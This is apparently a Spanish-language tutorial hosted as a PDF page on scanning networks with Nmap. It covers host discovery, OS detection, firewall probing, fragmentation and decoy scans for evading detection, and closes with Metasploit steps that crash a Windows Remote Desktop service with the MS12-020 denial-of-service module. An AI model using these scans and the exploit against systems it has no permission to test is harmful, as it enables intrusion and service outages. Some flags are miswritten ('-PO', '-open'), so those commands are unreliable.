Publicado el 29 de Noviembre del 2018
1.217 visualizaciones desde el 29 de Noviembre del 2018
617,6 KB
7 paginas
Creado hace 10a (29/10/2013)
Escaneo de Puertos con Nmap
Que es Nmap
Nmap es un programa de código abierto que sirve para efectuar rastreo de puertos
escrito originalmente por Gordon Lyon (más conocido por su alias Fyodor
Vaskovich). Se usa para evaluar la seguridad de sistemas informáticos, así como para
descubrir servicios o servidores en una red informática.
Donde descargarlo
Para Windows : http://nmap.org/
Para Ubuntu : Con permisos de administrador: sudo apt-get install nmap
Bien visto la Introduccion al lio.
Para ver la direccion IP del router
En Ubuntu bastara con : route -n
Debajo de pasarela tendreis una IP estilo : 192.168.1.1, 192.168.1.0
Bajo Windows : ipconfig/all
Puerta de enlace predeterminada: 192.168.1.1, 192.168.1.0
Para ver hosts activos en una red:
nmap -sP 192.168.1.1/24
Lo que nos mostraria los distintos dispositivos que hay conectados
Escanear un unico host:
nmap 192.168.1.129
Escanear un nombre de host:
nmap scanme.nmap.org
En esta web de nmap podemos probar el escaner
Ver mas informacion:
nmap -v 192.168.1.129
Escanear varios hosts:
nmap -v 127.0.0.1 192.168.1.129
Excluir un host:
nmap 127.0.0.1 –exclude 192.168.1.129
Deteccion de Sistema Operativo:
nmap -O 192.168.1.129
Para ver si un host tiene activado el Firewall:
nmap -sA 192.168.1.129
Como se puede ver filtered o filtrados es que tiene el Firewall activo
Escanear un host con el Firewall activado:
nmap -f 192.168.1.129 : Divide la cabecera TCP en varios paquetes
Con la diferencia de que antes el puerto 3389 Remote Desktop me mostraba
Unfiltered sin filtar.
Y ahora me dice open
Otra opcion es :
nmap -PO 192.168.1.129 que lo que hace es ignorar el ping antes del escaneo
Escaneo de puertos individuales:
Con la opcion: p
nmap -p 21,22,23,25,80,110,135,139,443,445 192.168.1.129
Escanear un rango de puertos:
nmap -p 1-1024 192.168.1.129
Escaneo rapido:
nmap -F 192.168.1.129
Escaneo de servicios y puertos:
nmap -sV 192.168.1.129
Escaneo sigiloso:
nmap -sS 192.168.1.129
Ver solo los puertos abiertos:
nmap -open 192.168.1.129
Escaneo de señuelo:
nmap -D 192.168.1.123,192.168.1.130 192.168.1.129
La primera direccion IP en llegar seria 192.168.1.123
La segunda direccion IP en llegar seria 192.168.1.130
Al final nuestro objetivo que es: 192.168.1.129
Y para terminar veamos como esplotar el servicio remoto del puerto 3389
Probado en Windows xp sp3 y Windows 7 Ultimate
Abrimos Metasploit
Y buscamos: search dos
Y elegimos este exploit
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Despues show options
set RHOST el host remoto
En este caso 192.168.1.129
Y exploit
Quedando asi Metasploit
Y asi Windows
Espero que os guste un saludo 4tf3
Comentarios de: Escaneo de Puertos con Nmap (0)
No hay comentarios